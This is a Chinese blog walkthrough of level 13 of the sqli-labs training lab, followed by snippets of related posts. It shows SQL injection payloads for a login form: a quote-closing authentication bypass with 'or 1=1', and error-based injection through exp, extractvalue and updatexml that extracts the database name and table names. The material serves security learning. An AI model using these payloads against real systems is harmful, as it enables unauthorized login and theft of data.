sqllab第十三关通关笔记

于 2024-03-14 18:17:03 发布
阅读量346 收藏 4
点赞数 10
文章标签: 笔记 sqllab
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/I_WORM/article/details/136717833
版权
本文讲述了利用登录框中的错误注入漏洞,逐步进行SQL注入攻击的过程,包括构造payload、绕过验证、获取数据库名等步骤,展示了报错注入在获取敏感信息中的应用。
摘要由CSDN通过智能技术生成

知识点:

  • 登录框处常见的语句(一般都是查询语句)
    • where username=''
    • where username=""
    • where usernam=('')
    • where username=("")
  • 错误注入知识回顾
  • 这里使用错误注入

通过admin admin登录发现没有任何回显信息;但是有成功登录的提示

通过bp抓包进行尝试绕过

尝试用单引号看看效果

构造payload:username=admin'

发现了报错信息;应该是一个where username=('输入内容')

好好好,这就好绕过了

构造payload:username=a')+or1=1#

欸,又报错了,发现了更多的信息;两个参数都是('输入内容');但是为啥会报错呢??

仔细一看发现or后面没加空格

重新构造payload:username=a')+or+1=1#

成功登录了;由于没有回显,这里不能用联合注入;

尝试进行错误注入

构造payload:username=a')+or+exp(710)#

成功打印了错误信息;说明这里是可以进行报错注入的

接下来利用报错注入获取数据库名

构造payload:username=a')+or+extractvalue(1,concat(0x7e,database(),0x7e))#

成功获取了数据库名;

到这里就结束了;报错注入获取表名和字段信息以及敏感内容信息在前几关就展示了;这里就不再进行演示了

10

Sqli-labs靶场第13详解[Sqli-labs-less-13]
m0_73615178的博客
03-02 692
所以,payload分析输入一个username值然后使用单引号加小括号 ') 闭合前面的语句,然后为了使where语句条件成立,加上一个or 1=1 ,-- 注释语句使后面的语句直接注释password不用判断。整条语句使用单引号加小括号 ") 闭合。由于这题是post请求,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。当值为3时报错显示,所以列数为2,但是没有显示位,所以尝试报错注入。根据题目看,像一个登录页面,尝试使用布尔型盲注测试能否登录网站。
sqli-labs-13
qq_53030229的博客
05-10 350
文章目录一、抓包、判断注入点二、判断回显字段三、获取数据库四、获取数据表五、获取字段六、获取用户名、密码 摸鱼中,最近不知道干什么ε=(´ο`*)))唉 一、抓包、判断注入点 二、判断回显字段 其实这里只有两个回显字段的,我这里使用3只是为了让你们方便看 uname=234')order by 3--+ 三、获取数据库 uname=234') and exp(~(select * from (select database() ) a) )--+ 四、获取数据表 uname=234') and
sqli-labs通关(十三)
qq_65950075的博客
05-03 758
报错原理:xml文档中查找字符位置是用/xxx/xxx/xxx/...这种格式,如果写入其他格式就会报错,并且会返回写入的非法格式内容,错误信息如:XPATH syntax error:'xxxxxxxx‘没有任何的返回信息,只有报错信息,那我们就用报错注入,让返回的报错信息包含我们的想要的信息。0x7e是~的意思,用concat拼接我们的sql语句,不符合xml文档的格式,就会报错,参数2:XPath_string(Xpath格式的字符串),注入时可操作的地方。作用:改变文档中符合条件的节点的值。
sqli-labs13(基于post提交的单引号加括号的报错盲注)通关思路
zyh1588的博客
11-10 362
小白回顾sql靶场第十三
SQL注入sqli-labs靶场通关(1-37
最新发布
qq_68163788的博客
02-03 9613
sqli-labs是一个用于学习和练习SQL注入的开源项目。它提供了一系列的实验室环境,让用户能够在不同的SQL注入场景中进行练习和测试。这些场景包括基本的SQL注入、盲注、联合查询注入等等。 sqli-labs还提供了详细的说明和解释,帮助用户理解SQL注入的原理和技术。通过这些实验和学习,用户可以更好地了解SQL注入的危害,并学会如何防范和阻止SQL注入攻击
详细讲解双查询注入
weixin_34138255的博客
03-22 369
上一篇文章中,http://leaver.me/archives/2726.html我说双查询很难讲清楚,这次就试着讲一下。读了一些原理性的东西。然后尽量通俗的给大家讲清楚。。在此之前,我们理解一下子查询,查询的键字是select,这个大家都知道。子查询可以简单的理解在一个select语句里还有一个select。里面的这个select语句就是子查询。看一个简单的例子:Sel...
DVWA 共12通关笔记
09-12
【DVWA 共12通关笔记】 DVWA(Damn Vulnerable Web Application)是一个用于网络安全教育的开源Web应用程序。它包含各种安全漏洞,为初学者和专业人士提供了实践和学习Web安全漏洞的机会。DVWA分为多个级别,从低...
愤怒的小鸟水煮蛋1-13通关录像.mp4
05-11
愤怒的小鸟水煮蛋1-13通关录像
愤怒的小鸟水煮蛋1-15通关录像.mp4
05-13
愤怒的小鸟水煮蛋1-15通关录像
愤怒的小鸟水煮蛋1-3通关录像.mp4
05-02
愤怒的小鸟水煮蛋1-3通关录像
算法通关村第一-链表青铜挑战笔记
10-28
源代码
sqli-labs通关-------13lesson-post(单引号变形双注入)
枯藤闲画云
07-05 299
我们根据尝试发现有报错。以及数据应该是以单引号和括号闭合的。 尝试万能密码发现无效 然后通过bp抓包改包下面的都可以 uname=admin') and extractvalue(1,concat(0x7e,(select database()))) and (' uname=admin') and extractvalue(1,concat(0x7e,(select dat...
sqli - labs - 13 ~ 14
m0_62102000的博客
07-15 273
sqli - labs - 13 ~ 14
sqli-labs靶场第十三
gou1791241251的博客
12-27 815
paloy:admin’) or (select table_name from information_schema.tables where table_schema=database() limit 0,1)=‘emails’ # 闭合方式为’) 可以使用布尔盲注和报错注入
sql注入13------报错注入和联合注入
qq_45751902的博客
03-14 556
闭合符 ') or 1=1 # 结果没有回显,可以考虑延时注入,布尔盲注和报错注入 但是延时注入对于错误和正确没有时间区别,所以不能用 报错注入有回显,所以布尔盲注就不用了 admin') union select 1,updatexml(1,concat(0x7e,(select database()),0x7e),1)# 既然已经确定是报错注入和联合注入了,那么和前面的差不多了。 ...
13SQL注入漏洞(入门)
lqyzkn的博客
08-02 128
内容
SQL注入——sqli-labs靶场闯(13~20)
m0re's blog
04-30 1534
本文目录 前言:SQL注入必须要拿下,所以继续学习并在靶场实验。 再次学习SQL注入知识,再补充一些基本知识。 注入通过在URL中修改对应的id值,为正常数字、大数字、字符(单引号、双引号、双单引号、括号)、反斜扛 来探测是否存在注入点。 ...
sql二次注入-sqli-labs第13
weixin_46784800的博客
11-04 1015
获取数据操作 判断所查询数据库中包含的列数 采用post进行参数输入: uname=') order by 3 -- - &passwd=') -- - 通过对查询结果进行排序,发现无法对第三列进行排序,且报错Unknown column ‘3’ in ‘order clause’,则说明所查询数据库中共有两列数据。 判断输出数据与数据库的联系 输入语句 uname=') or 1=1 -- - &passwd=') -- - 可发现界面只有登录成功的提示,则说明该网站为盲注,则
sql-labtips 十三~十四
weixin_44089266的博客
04-09 344
**第十三为基于post提交的报错型注入,第十四第十三基本相同,只是闭合方式的不同,只对第十三进行详解 提前声明:本机测试地址为 192.168.226.136 以下仅供参考,切勿用作其他用途,若有错误之处,望见谅 ** 由于是POST型注入,故需要使用burp进行代理抓包,以便修改其中传递的内容 尝试构造其闭合方式,先使用’单引号,查看其回显 可观察到提示sql错误语句。并且弹出了...
DVWA安全挑战:12通关攻略笔记
DVWA共12通关笔记涵盖了DVWA的12个不同的难度等级,每个等级都有不同的安全缺陷和配置,用户需要利用这些缺陷来完成攻击任务。从最简单的默认密码和常见的SQL注入,到更高级的漏洞利用,这些练习可以帮助用户理解...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

I_WORM

大佬们,赏点儿碎银吧~~

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值